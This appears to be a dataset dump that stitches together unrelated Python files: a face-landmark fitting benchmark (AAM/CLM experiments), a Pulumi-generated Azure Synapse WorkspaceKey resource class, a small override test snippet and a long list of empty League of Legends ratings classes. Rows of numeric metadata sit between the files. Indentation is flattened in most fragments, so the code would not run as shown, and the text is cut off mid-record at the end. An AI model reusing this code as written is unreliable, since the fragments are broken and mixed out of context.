        perturb_options = {'noise_std': 0.04,
'rotation': False}
# training
training_options['features'] = features[i]
training_options['scaled_shape_models'] = scaled_shape_models[i]
aam = aam_build_benchmark(training_images,
training_options=training_options,
verbose=verbose)
# fitting
fitting_options['n_shape'] = n_shape[i]
fitting_options['n_appearance'] = n_appearance[i]
        perturb_options['noise_std'] = noise_std[i]
        perturb_options['rotation'] = rotation[i]
fitting_results = aam_fit_benchmark(fitting_images, aam,
                                            perturb_options=perturb_options,
fitting_options=fitting_options,
verbose=verbose)
all_fitting_results.append(fitting_results)
# convert results
final_error_curve, initial_error_curve, error_bins = \
convert_fitting_results_to_ced(
fitting_results, max_error_bin=max_error_bin,
bins_error_step=bins_error_step,
error_type=error_type)
curves_to_plot.append(final_error_curve)
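        # keep only the last experiment's initialization curve for the plot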
if i == n_experiments - 1:
curves_to_plot.append(initial_error_curve)
# plot results
if plot:
title = "AAMs using Alternating IC"
colour_list = ['r', 'b', 'g', 'y', 'c'] * n_experiments
marker_list = ['o', 'x', 'v', 'd'] * n_experiments
plot_fitting_curves(error_bins, curves_to_plot, title, new_figure=True,
x_limit=max_error_bin, line_colour=colour_list,
marker_face_colour=colour_list,
marker_style=marker_list)
return all_fitting_results
def clm_params_combinations_noise(training_db_path, fitting_db_path,
n_experiments=1, classifier_trainers=None,
patch_shape=None, features=None,
scaled_shape_models=None, n_shape=None,
noise_std=None, rotation=None, verbose=False,
plot=False):
# parse input
if classifier_trainers is None:
classifier_trainers = [linear_svm_lr] * n_experiments
    elif len(classifier_trainers) != n_experiments:
raise ValueError("classifier_trainers has wrong length")
if patch_shape is None:
patch_shape = [(5, 5)] * n_experiments
    elif len(patch_shape) != n_experiments:
raise ValueError("patch_shape has wrong length")
if features is None:
features = [igo] * n_experiments
    elif len(features) != n_experiments:
raise ValueError("features has wrong length")
if scaled_shape_models is None:
scaled_shape_models = [True] * n_experiments
    elif len(scaled_shape_models) != n_experiments:
raise ValueError("scaled_shape_models has wrong length")
if n_shape is None:
n_shape = [[3, 6, 12]] * n_experiments
    elif len(n_shape) != n_experiments:
raise ValueError("n_shape has wrong length")
if noise_std is None:
noise_std = [0.04] * n_experiments
    elif len(noise_std) != n_experiments:
raise ValueError("noise_std has wrong length")
if rotation is None:
rotation = [False] * n_experiments
    elif len(rotation) != n_experiments:
raise ValueError("rotation has wrong length")
# load images
db_loading_options = {'crop_proportion': 0.4,
'convert_to_grey': True
}
training_images = load_database(training_db_path,
db_loading_options=db_loading_options,
verbose=verbose)
fitting_images = load_database(fitting_db_path,
db_loading_options=db_loading_options,
verbose=verbose)
# run experiments
max_error_bin = 0.05
bins_error_step = 0.005
curves_to_plot = []
all_fitting_results = []
for i in range(n_experiments):
if verbose:
print("\nEXPERIMENT {}/{}:".format(i + 1, n_experiments))
print("- classifiers: {}\n- patch_shape: {}\n"
"- features: {}\n- scaled_shape_models: {}\n"
"- n_shape: {}\n"
"- noise_std: {}\n- rotation: {}".format(
classifier_trainers[i], patch_shape[i], features[i],
scaled_shape_models[i], n_shape[i],
noise_std[i], rotation[i]))
# predefined option dictionaries
error_type = 'me_norm'
training_options = {'group': 'PTS',
'classifier_trainers': linear_svm_lr,
'patch_shape': (5, 5),
'features': sparse_hog,
'normalization_diagonal': None,
'n_levels': 3,
'downscale': 1.1,
'scaled_shape_models': False,
'max_shape_components': None,
'boundary': 3
}
fitting_options = {'algorithm': RLMS,
'pdm_transform': OrthoPDM,
'n_shape': [3, 6, 12],
'max_iters': 50,
'error_type': error_type
}
perturb_options = {'noise_std': 0.01,
'rotation': False}
# training
training_options['classifier_trainers'] = classifier_trainers[i]
training_options['patch_shape'] = patch_shape[i]
training_options['features'] = features[i]
training_options['scaled_shape_models'] = scaled_shape_models[i]
clm = clm_build_benchmark(training_images,
training_options=training_options,
verbose=verbose)
# fitting
fitting_options['n_shape'] = n_shape[i]
perturb_options['noise_std'] = noise_std[i]
perturb_options['rotation'] = rotation[i]
fitting_results = clm_fit_benchmark(fitting_images, clm,
perturb_options=perturb_options,
fitting_options=fitting_options,
verbose=verbose)
all_fitting_results.append(fitting_results)
# convert results
final_error_curve, initial_error_curve, error_bins = \
convert_fitting_results_to_ced(
fitting_results, max_error_bin=max_error_bin,
bins_error_step=bins_error_step,
error_type=error_type)
curves_to_plot.append(final_error_curve)
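        # keep only the last experiment's initialization curve for the plot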
if i == n_experiments - 1:
curves_to_plot.append(initial_error_curve)
# plot results
if plot:
title = "CLMs using RLMS"
colour_list = ['r', 'b', 'g', 'y', 'c'] * n_experiments
marker_list = ['o', 'x', 'v', 'd'] * n_experiments
plot_fitting_curves(error_bins, curves_to_plot, title, new_figure=True,
x_limit=max_error_bin, line_colour=colour_list,
marker_face_colour=colour_list,
marker_style=marker_list)
return all_fitting_results
| 43.848718 | 79 | 0.527455 | 3,282 | 34,202 | 5.105119 | 0.058806 | 0.044763 | 0.042972 | 0.0302 | 0.933691 | 0.924799 | 0.910654 | 0.902477 | 0.898418 | 0.880215 | 0 | 0.013999 | 0.39638 | 34,202 | 779 | 80 | 43.905006 | 0.797578 | 0.029998 | 0 | 0.826019 | 0 | 0 | 0.107286 | 0.009753 | 0 | 0 | 0 | 0 | 0 | 1 | 0.014107 | false | 0 | 0.020376 | 0 | 0.048589 | 0.00627 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
37959c4763801fd3b2d0574049dda7b7f037ae25 | 36 | py | Python | networks/__init__.py | chenpan0615/FCCDN_pytorch | 0589988a62b031d678358c7462b2f236c0f17555 | [
"MIT"
] | 18 | 2021-08-11T07:04:19.000Z | 2022-03-29T02:08:32.000Z | networks/__init__.py | chenpan0615/FCCDN_pytorch | 0589988a62b031d678358c7462b2f236c0f17555 | [
"MIT"
] | 5 | 2021-10-02T03:18:26.000Z | 2022-03-29T02:59:48.000Z | networks/__init__.py | chenpan0615/FCCDN_pytorch | 0589988a62b031d678358c7462b2f236c0f17555 | [
"MIT"
] | 5 | 2021-11-18T14:54:10.000Z | 2022-03-29T02:08:34.000Z | from .GenerateNet import GenerateNet | 36 | 36 | 0.888889 | 4 | 36 | 8 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 36 | 1 | 36 | 36 | 0.969697 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
37bc78283f980d2bcb555def50a5cafef2f72354 | 13,662 | py | Python | sdk/python/pulumi_azure/synapse/workspace_key.py | ScriptBox99/pulumi-azure | 1b8c6d5479ccabc39094741eac25a8ca44c8833a | [
"ECL-2.0",
"Apache-2.0"
] | 109 | 2018-06-18T00:19:44.000Z | 2022-02-20T05:32:57.000Z | sdk/python/pulumi_azure/synapse/workspace_key.py | ScriptBox99/pulumi-azure | 1b8c6d5479ccabc39094741eac25a8ca44c8833a | [
"ECL-2.0",
"Apache-2.0"
] | 663 | 2018-06-18T21:08:46.000Z | 2022-03-31T20:10:11.000Z | sdk/python/pulumi_azure/synapse/workspace_key.py | ScriptBox99/pulumi-azure | 1b8c6d5479ccabc39094741eac25a8ca44c8833a | [
"ECL-2.0",
"Apache-2.0"
] | 41 | 2018-07-19T22:37:38.000Z | 2022-03-14T10:56:26.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['WorkspaceKeyArgs', 'WorkspaceKey']
@pulumi.input_type
class WorkspaceKeyArgs:
def __init__(__self__, *,
active: pulumi.Input[bool],
synapse_workspace_id: pulumi.Input[str],
cusomter_managed_key_name: Optional[pulumi.Input[str]] = None,
customer_managed_key_name: Optional[pulumi.Input[str]] = None,
customer_managed_key_versionless_id: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a WorkspaceKey resource.
"""
pulumi.set(__self__, "active", active)
pulumi.set(__self__, "synapse_workspace_id", synapse_workspace_id)
if cusomter_managed_key_name is not None:
warnings.warn("""As this property name contained a typo originally, please switch to using 'customer_managed_key_name' instead.""", DeprecationWarning)
pulumi.log.warn("""cusomter_managed_key_name is deprecated: As this property name contained a typo originally, please switch to using 'customer_managed_key_name' instead.""")
if cusomter_managed_key_name is not None:
pulumi.set(__self__, "cusomter_managed_key_name", cusomter_managed_key_name)
if customer_managed_key_name is not None:
pulumi.set(__self__, "customer_managed_key_name", customer_managed_key_name)
if customer_managed_key_versionless_id is not None:
pulumi.set(__self__, "customer_managed_key_versionless_id", customer_managed_key_versionless_id)
@property
@pulumi.getter
def active(self) -> pulumi.Input[bool]:
return pulumi.get(self, "active")
@active.setter
def active(self, value: pulumi.Input[bool]):
pulumi.set(self, "active", value)
@property
@pulumi.getter(name="synapseWorkspaceId")
def synapse_workspace_id(self) -> pulumi.Input[str]:
return pulumi.get(self, "synapse_workspace_id")
@synapse_workspace_id.setter
def synapse_workspace_id(self, value: pulumi.Input[str]):
pulumi.set(self, "synapse_workspace_id", value)
@property
@pulumi.getter(name="cusomterManagedKeyName")
def cusomter_managed_key_name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "cusomter_managed_key_name")
@cusomter_managed_key_name.setter
def cusomter_managed_key_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cusomter_managed_key_name", value)
@property
@pulumi.getter(name="customerManagedKeyName")
def customer_managed_key_name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "customer_managed_key_name")
@customer_managed_key_name.setter
def customer_managed_key_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "customer_managed_key_name", value)
@property
@pulumi.getter(name="customerManagedKeyVersionlessId")
def customer_managed_key_versionless_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "customer_managed_key_versionless_id")
@customer_managed_key_versionless_id.setter
def customer_managed_key_versionless_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "customer_managed_key_versionless_id", value)
@pulumi.input_type
class _WorkspaceKeyState:
def __init__(__self__, *,
active: Optional[pulumi.Input[bool]] = None,
cusomter_managed_key_name: Optional[pulumi.Input[str]] = None,
customer_managed_key_name: Optional[pulumi.Input[str]] = None,
customer_managed_key_versionless_id: Optional[pulumi.Input[str]] = None,
synapse_workspace_id: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering WorkspaceKey resources.
"""
if active is not None:
pulumi.set(__self__, "active", active)
if cusomter_managed_key_name is not None:
warnings.warn("""As this property name contained a typo originally, please switch to using 'customer_managed_key_name' instead.""", DeprecationWarning)
pulumi.log.warn("""cusomter_managed_key_name is deprecated: As this property name contained a typo originally, please switch to using 'customer_managed_key_name' instead.""")
if cusomter_managed_key_name is not None:
pulumi.set(__self__, "cusomter_managed_key_name", cusomter_managed_key_name)
if customer_managed_key_name is not None:
pulumi.set(__self__, "customer_managed_key_name", customer_managed_key_name)
if customer_managed_key_versionless_id is not None:
pulumi.set(__self__, "customer_managed_key_versionless_id", customer_managed_key_versionless_id)
if synapse_workspace_id is not None:
pulumi.set(__self__, "synapse_workspace_id", synapse_workspace_id)
@property
@pulumi.getter
def active(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "active")
@active.setter
def active(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "active", value)
@property
@pulumi.getter(name="cusomterManagedKeyName")
def cusomter_managed_key_name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "cusomter_managed_key_name")
@cusomter_managed_key_name.setter
def cusomter_managed_key_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cusomter_managed_key_name", value)
@property
@pulumi.getter(name="customerManagedKeyName")
def customer_managed_key_name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "customer_managed_key_name")
@customer_managed_key_name.setter
def customer_managed_key_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "customer_managed_key_name", value)
@property
@pulumi.getter(name="customerManagedKeyVersionlessId")
def customer_managed_key_versionless_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "customer_managed_key_versionless_id")
@customer_managed_key_versionless_id.setter
def customer_managed_key_versionless_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "customer_managed_key_versionless_id", value)
@property
@pulumi.getter(name="synapseWorkspaceId")
def synapse_workspace_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "synapse_workspace_id")
@synapse_workspace_id.setter
def synapse_workspace_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "synapse_workspace_id", value)
class WorkspaceKey(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
active: Optional[pulumi.Input[bool]] = None,
cusomter_managed_key_name: Optional[pulumi.Input[str]] = None,
customer_managed_key_name: Optional[pulumi.Input[str]] = None,
customer_managed_key_versionless_id: Optional[pulumi.Input[str]] = None,
synapse_workspace_id: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Create a WorkspaceKey resource with the given unique name, props, and options.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: WorkspaceKeyArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Create a WorkspaceKey resource with the given unique name, props, and options.
:param str resource_name: The name of the resource.
:param WorkspaceKeyArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(WorkspaceKeyArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
active: Optional[pulumi.Input[bool]] = None,
cusomter_managed_key_name: Optional[pulumi.Input[str]] = None,
customer_managed_key_name: Optional[pulumi.Input[str]] = None,
customer_managed_key_versionless_id: Optional[pulumi.Input[str]] = None,
synapse_workspace_id: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = WorkspaceKeyArgs.__new__(WorkspaceKeyArgs)
if active is None and not opts.urn:
raise TypeError("Missing required property 'active'")
__props__.__dict__["active"] = active
if cusomter_managed_key_name is not None and not opts.urn:
warnings.warn("""As this property name contained a typo originally, please switch to using 'customer_managed_key_name' instead.""", DeprecationWarning)
pulumi.log.warn("""cusomter_managed_key_name is deprecated: As this property name contained a typo originally, please switch to using 'customer_managed_key_name' instead.""")
__props__.__dict__["cusomter_managed_key_name"] = cusomter_managed_key_name
__props__.__dict__["customer_managed_key_name"] = customer_managed_key_name
__props__.__dict__["customer_managed_key_versionless_id"] = customer_managed_key_versionless_id
if synapse_workspace_id is None and not opts.urn:
raise TypeError("Missing required property 'synapse_workspace_id'")
__props__.__dict__["synapse_workspace_id"] = synapse_workspace_id
super(WorkspaceKey, __self__).__init__(
'azure:synapse/workspaceKey:WorkspaceKey',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
active: Optional[pulumi.Input[bool]] = None,
cusomter_managed_key_name: Optional[pulumi.Input[str]] = None,
customer_managed_key_name: Optional[pulumi.Input[str]] = None,
customer_managed_key_versionless_id: Optional[pulumi.Input[str]] = None,
synapse_workspace_id: Optional[pulumi.Input[str]] = None) -> 'WorkspaceKey':
"""
Get an existing WorkspaceKey resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _WorkspaceKeyState.__new__(_WorkspaceKeyState)
__props__.__dict__["active"] = active
__props__.__dict__["cusomter_managed_key_name"] = cusomter_managed_key_name
__props__.__dict__["customer_managed_key_name"] = customer_managed_key_name
__props__.__dict__["customer_managed_key_versionless_id"] = customer_managed_key_versionless_id
__props__.__dict__["synapse_workspace_id"] = synapse_workspace_id
return WorkspaceKey(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def active(self) -> pulumi.Output[bool]:
return pulumi.get(self, "active")
@property
@pulumi.getter(name="cusomterManagedKeyName")
def cusomter_managed_key_name(self) -> pulumi.Output[str]:
return pulumi.get(self, "cusomter_managed_key_name")
@property
@pulumi.getter(name="customerManagedKeyName")
def customer_managed_key_name(self) -> pulumi.Output[str]:
return pulumi.get(self, "customer_managed_key_name")
@property
@pulumi.getter(name="customerManagedKeyVersionlessId")
def customer_managed_key_versionless_id(self) -> pulumi.Output[Optional[str]]:
return pulumi.get(self, "customer_managed_key_versionless_id")
@property
@pulumi.getter(name="synapseWorkspaceId")
def synapse_workspace_id(self) -> pulumi.Output[str]:
return pulumi.get(self, "synapse_workspace_id")
| 48.792857 | 190 | 0.694701 | 1,605 | 13,662 | 5.522741 | 0.092835 | 0.104919 | 0.104242 | 0.081904 | 0.80009 | 0.782265 | 0.776512 | 0.75722 | 0.733078 | 0.706679 | 0 | 0.000093 | 0.21278 | 13,662 | 279 | 191 | 48.967742 | 0.824082 | 0.082931 | 0 | 0.699531 | 1 | 0.014085 | 0.192819 | 0.104393 | 0 | 0 | 0 | 0 | 0 | 1 | 0.150235 | false | 0.004695 | 0.023474 | 0.070423 | 0.262911 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
807c1d5498f15e6de8d068bf147332465a66369d | 137 | py | Python | python/testData/override/indent_after.py | teddywest32/intellij-community | e0268d7a1da1d318b441001448cdd3e8929b2f29 | [
"Apache-2.0"
] | null | null | null | python/testData/override/indent_after.py | teddywest32/intellij-community | e0268d7a1da1d318b441001448cdd3e8929b2f29 | [
"Apache-2.0"
] | 11 | 2017-02-27T22:35:32.000Z | 2021-12-24T08:07:40.000Z | python/testData/override/indent_after.py | teddywest32/intellij-community | e0268d7a1da1d318b441001448cdd3e8929b2f29 | [
"Apache-2.0"
] | 1 | 2019-02-06T14:50:03.000Z | 2019-02-06T14:50:03.000Z | class Dialog:
def validate(self): pass
class B(Dialog):
def validate(self):
<selection>Dialog.validate(self)</selection> | 22.833333 | 52 | 0.678832 | 17 | 137 | 5.470588 | 0.470588 | 0.387097 | 0.365591 | 0.451613 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.189781 | 137 | 6 | 52 | 22.833333 | 0.837838 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.2 | 0 | null | null | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
80fc0749713257291dc93a80b4688cdadbbb9c01 | 6,959 | py | Python | loldib/getratings/models/NA/na_tahmkench/na_tahmkench_mid.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | loldib/getratings/models/NA/na_tahmkench/na_tahmkench_mid.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | loldib/getratings/models/NA/na_tahmkench/na_tahmkench_mid.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | from getratings.models.ratings import Ratings
class NA_TahmKench_Mid_Aatrox(Ratings):
pass
class NA_TahmKench_Mid_Ahri(Ratings):
pass
class NA_TahmKench_Mid_Akali(Ratings):
pass
class NA_TahmKench_Mid_Alistar(Ratings):
pass
class NA_TahmKench_Mid_Amumu(Ratings):
pass
class NA_TahmKench_Mid_Anivia(Ratings):
pass
class NA_TahmKench_Mid_Annie(Ratings):
pass
class NA_TahmKench_Mid_Ashe(Ratings):
pass
class NA_TahmKench_Mid_AurelionSol(Ratings):
pass
class NA_TahmKench_Mid_Azir(Ratings):
pass
class NA_TahmKench_Mid_Bard(Ratings):
pass
class NA_TahmKench_Mid_Blitzcrank(Ratings):
pass
class NA_TahmKench_Mid_Brand(Ratings):
pass
class NA_TahmKench_Mid_Braum(Ratings):
pass
class NA_TahmKench_Mid_Caitlyn(Ratings):
pass
class NA_TahmKench_Mid_Camille(Ratings):
pass
class NA_TahmKench_Mid_Cassiopeia(Ratings):
pass
class NA_TahmKench_Mid_Chogath(Ratings):
pass
class NA_TahmKench_Mid_Corki(Ratings):
pass
class NA_TahmKench_Mid_Darius(Ratings):
pass
class NA_TahmKench_Mid_Diana(Ratings):
pass
class NA_TahmKench_Mid_Draven(Ratings):
pass
class NA_TahmKench_Mid_DrMundo(Ratings):
pass
class NA_TahmKench_Mid_Ekko(Ratings):
pass
class NA_TahmKench_Mid_Elise(Ratings):
pass
class NA_TahmKench_Mid_Evelynn(Ratings):
pass
class NA_TahmKench_Mid_Ezreal(Ratings):
pass
class NA_TahmKench_Mid_Fiddlesticks(Ratings):
pass
class NA_TahmKench_Mid_Fiora(Ratings):
pass
class NA_TahmKench_Mid_Fizz(Ratings):
pass
class NA_TahmKench_Mid_Galio(Ratings):
pass
class NA_TahmKench_Mid_Gangplank(Ratings):
pass
class NA_TahmKench_Mid_Garen(Ratings):
pass
class NA_TahmKench_Mid_Gnar(Ratings):
pass
class NA_TahmKench_Mid_Gragas(Ratings):
pass
class NA_TahmKench_Mid_Graves(Ratings):
pass
class NA_TahmKench_Mid_Hecarim(Ratings):
pass
class NA_TahmKench_Mid_Heimerdinger(Ratings):
pass
class NA_TahmKench_Mid_Illaoi(Ratings):
pass
class NA_TahmKench_Mid_Irelia(Ratings):
pass
class NA_TahmKench_Mid_Ivern(Ratings):
pass
class NA_TahmKench_Mid_Janna(Ratings):
pass
class NA_TahmKench_Mid_JarvanIV(Ratings):
pass
class NA_TahmKench_Mid_Jax(Ratings):
pass
class NA_TahmKench_Mid_Jayce(Ratings):
pass
class NA_TahmKench_Mid_Jhin(Ratings):
pass
class NA_TahmKench_Mid_Jinx(Ratings):
pass
class NA_TahmKench_Mid_Kalista(Ratings):
pass
class NA_TahmKench_Mid_Karma(Ratings):
pass
class NA_TahmKench_Mid_Karthus(Ratings):
pass
class NA_TahmKench_Mid_Kassadin(Ratings):
pass
class NA_TahmKench_Mid_Katarina(Ratings):
pass
class NA_TahmKench_Mid_Kayle(Ratings):
pass
class NA_TahmKench_Mid_Kayn(Ratings):
pass
class NA_TahmKench_Mid_Kennen(Ratings):
pass
class NA_TahmKench_Mid_Khazix(Ratings):
pass
class NA_TahmKench_Mid_Kindred(Ratings):
pass
class NA_TahmKench_Mid_Kled(Ratings):
pass
class NA_TahmKench_Mid_KogMaw(Ratings):
pass
class NA_TahmKench_Mid_Leblanc(Ratings):
pass
class NA_TahmKench_Mid_LeeSin(Ratings):
pass
class NA_TahmKench_Mid_Leona(Ratings):
pass
class NA_TahmKench_Mid_Lissandra(Ratings):
pass
class NA_TahmKench_Mid_Lucian(Ratings):
pass
class NA_TahmKench_Mid_Lulu(Ratings):
pass
class NA_TahmKench_Mid_Lux(Ratings):
pass
class NA_TahmKench_Mid_Malphite(Ratings):
pass
class NA_TahmKench_Mid_Malzahar(Ratings):
pass
class NA_TahmKench_Mid_Maokai(Ratings):
pass
class NA_TahmKench_Mid_MasterYi(Ratings):
pass
class NA_TahmKench_Mid_MissFortune(Ratings):
pass
class NA_TahmKench_Mid_MonkeyKing(Ratings):
pass
class NA_TahmKench_Mid_Mordekaiser(Ratings):
pass
class NA_TahmKench_Mid_Morgana(Ratings):
pass
class NA_TahmKench_Mid_Nami(Ratings):
pass
class NA_TahmKench_Mid_Nasus(Ratings):
pass
class NA_TahmKench_Mid_Nautilus(Ratings):
pass
class NA_TahmKench_Mid_Nidalee(Ratings):
pass
class NA_TahmKench_Mid_Nocturne(Ratings):
pass
class NA_TahmKench_Mid_Nunu(Ratings):
pass
class NA_TahmKench_Mid_Olaf(Ratings):
pass
class NA_TahmKench_Mid_Orianna(Ratings):
pass
class NA_TahmKench_Mid_Ornn(Ratings):
pass
class NA_TahmKench_Mid_Pantheon(Ratings):
pass
class NA_TahmKench_Mid_Poppy(Ratings):
pass
class NA_TahmKench_Mid_Quinn(Ratings):
pass
class NA_TahmKench_Mid_Rakan(Ratings):
pass
class NA_TahmKench_Mid_Rammus(Ratings):
pass
class NA_TahmKench_Mid_RekSai(Ratings):
pass
class NA_TahmKench_Mid_Renekton(Ratings):
pass
class NA_TahmKench_Mid_Rengar(Ratings):
pass
class NA_TahmKench_Mid_Riven(Ratings):
pass
class NA_TahmKench_Mid_Rumble(Ratings):
pass
class NA_TahmKench_Mid_Ryze(Ratings):
pass
class NA_TahmKench_Mid_Sejuani(Ratings):
pass
class NA_TahmKench_Mid_Shaco(Ratings):
pass
class NA_TahmKench_Mid_Shen(Ratings):
pass
class NA_TahmKench_Mid_Shyvana(Ratings):
pass
class NA_TahmKench_Mid_Singed(Ratings):
pass
class NA_TahmKench_Mid_Sion(Ratings):
pass
class NA_TahmKench_Mid_Sivir(Ratings):
pass
class NA_TahmKench_Mid_Skarner(Ratings):
pass
class NA_TahmKench_Mid_Sona(Ratings):
pass
class NA_TahmKench_Mid_Soraka(Ratings):
pass
class NA_TahmKench_Mid_Swain(Ratings):
pass
class NA_TahmKench_Mid_Syndra(Ratings):
pass
class NA_TahmKench_Mid_TahmKench(Ratings):
pass
class NA_TahmKench_Mid_Taliyah(Ratings):
pass
class NA_TahmKench_Mid_Talon(Ratings):
pass
class NA_TahmKench_Mid_Taric(Ratings):
pass
class NA_TahmKench_Mid_Teemo(Ratings):
pass
class NA_TahmKench_Mid_Thresh(Ratings):
pass
class NA_TahmKench_Mid_Tristana(Ratings):
pass
class NA_TahmKench_Mid_Trundle(Ratings):
pass
class NA_TahmKench_Mid_Tryndamere(Ratings):
pass
class NA_TahmKench_Mid_TwistedFate(Ratings):
pass
class NA_TahmKench_Mid_Twitch(Ratings):
pass
class NA_TahmKench_Mid_Udyr(Ratings):
pass
class NA_TahmKench_Mid_Urgot(Ratings):
pass
class NA_TahmKench_Mid_Varus(Ratings):
pass
class NA_TahmKench_Mid_Vayne(Ratings):
pass
class NA_TahmKench_Mid_Veigar(Ratings):
pass
class NA_TahmKench_Mid_Velkoz(Ratings):
pass
class NA_TahmKench_Mid_Vi(Ratings):
pass
class NA_TahmKench_Mid_Viktor(Ratings):
pass
class NA_TahmKench_Mid_Vladimir(Ratings):
pass
class NA_TahmKench_Mid_Volibear(Ratings):
pass
class NA_TahmKench_Mid_Warwick(Ratings):
pass
class NA_TahmKench_Mid_Xayah(Ratings):
pass
class NA_TahmKench_Mid_Xerath(Ratings):
pass
class NA_TahmKench_Mid_XinZhao(Ratings):
pass
class NA_TahmKench_Mid_Yasuo(Ratings):
pass
class NA_TahmKench_Mid_Yorick(Ratings):
pass
class NA_TahmKench_Mid_Zac(Ratings):
pass
class NA_TahmKench_Mid_Zed(Ratings):
pass
class NA_TahmKench_Mid_Ziggs(Ratings):
pass
class NA_TahmKench_Mid_Zilean(Ratings):
pass
class NA_TahmKench_Mid_Zyra(Ratings):
pass
| 16.688249 | 46 | 0.780572 | 972 | 6,959 | 5.162551 | 0.151235 | 0.192507 | 0.440016 | 0.522519 | 0.819051 | 0.819051 | 0 | 0 | 0 | 0 | 0 | 0 | 0.159649 | 6,959 | 416 | 47 | 16.728365 | 0.858071 | 0 | 0 | 0.498195 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.498195 | 0.00361 | 0 | 0.501805 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 7 |
80fe31c3aefdaccaae877a965dfa7f1bec006821 | 43 | py | Python | src/lib/sre_compile.py | DTenore/skulpt | 098d20acfb088d6db85535132c324b7ac2f2d212 | [
"MIT"
